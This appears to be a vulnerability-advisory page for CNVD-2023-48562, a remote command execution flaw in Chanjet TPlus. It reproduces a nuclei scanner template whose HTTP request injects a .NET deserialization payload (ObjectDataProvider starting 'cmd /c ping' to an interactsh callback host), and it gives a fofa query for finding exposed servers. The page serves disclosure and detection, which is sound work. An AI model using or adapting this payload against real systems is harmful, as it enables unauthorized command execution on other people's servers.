CNVD-2023-48562: Chanjet TPlus GetStoreWarehouseByStore - Remote Command Execution

日期: 2025-08-01 | 影响软件: Chanjet TPlus | POC: 已公开

漏洞描述

Changjet Tplus has a front-end remote code execution vulnerability. An attacker can use the GetStoreWarehouseByStore method to inject a serialized payload and execute arbitrary commands. This ultimately results in leakage of sensitive server information or code execution.

PoC代码[已公开]

id: CNVD-2023-48562

info:
  name: Chanjet TPlus GetStoreWarehouseByStore - Remote Command Execution
  author: SleepingBag945
  severity: critical
  description: |
    Changjet Tplus has a front-end remote code execution vulnerability. An attacker can use the GetStoreWarehouseByStore method to inject a serialized payload and execute arbitrary commands. This ultimately results in leakage of sensitive server information or code execution.
  reference:
    - https://peiqi.wgpsec.org/wiki/webapp/%E7%94%A8%E5%8F%8B/%E7%94%A8%E5%8F%8B%20%E7%95%85%E6%8D%B7%E9%80%9AT+%20GetStoreWarehouseByStore%20%E8%BF%9C%E7%A8%8B%E5%91%BD%E4%BB%A4%E6%89%A7%E8%A1%8C%E6%BC%8F%E6%B4%9E.html
    - https://github.com/MrWQ/vulnerability-paper/blob/7551f7584bd35039028b1d9473a00201ed18e6b2/bugs/%E7%95%85%E6%8D%B7%E9%80%9A%20T%2B%20%E8%BF%9C%E7%A8%8B%E5%91%BD%E4%BB%A4%E6%89%A7%E8%A1%8C%E6%BC%8F%E6%B4%9E.md
  classification:
  metadata:
    verified: true
    max-request: 1
    fofa-query: app="畅捷通-TPlus"
  tags: cnvd,cnvd2023,chanjettplus,rce,oast,vuln

http:
  - raw:
      - |
        POST /tplus/ajaxpro/Ufida.T.CodeBehind._PriorityLevel,App_Code.ashx?method=GetStoreWarehouseByStore HTTP/1.1
        Host: {{Hostname}}
        X-Ajaxpro-Method: GetStoreWarehouseByStore

        {
          "storeID":{
            "__type":"System.Windows.Data.ObjectDataProvider, PresentationFramework, Version=4.0.0.0, Culture=neutral, PublicKeyToken=31bf3856ad364e35",
            "MethodName":"Start",
            "ObjectInstance":{
            "__type":"System.Diagnostics.Process, System, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089",
            "StartInfo":{
              "__type":"System.Diagnostics.ProcessStartInfo, System, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089",
              "FileName":"cmd",
              "Arguments":"/c ping {{interactsh-url}}"
            }
            }
          }
        }

    matchers-condition: and
    matchers:
      - type: word
        part: body
        words:
          - "actorId或archivesId不能为空"
          - "\"Type\":\"System.ArgumentException\""
          - "Object reference not set to an instance of an object"
          - "System.NullReferenceException"
        condition: or

      - type: word
        part: interactsh_protocol
        words:
          - "dns"
# digest: 490a004630440220772d1d2d6cb329d5d59e3963a7061111663d96b3f997c677723414e1df461ad6022011fd359134e0b30d65982f710f1f0471e266b0c64ef1f8ed424bad42c50f2d05:922c64590222798bb761d5b6d8e72950
来源: https://github.com/projectdiscovery/nuclei-templates/blob/main/http/cnvd/2023/CNVD-2023-48562.yaml

相关漏洞推荐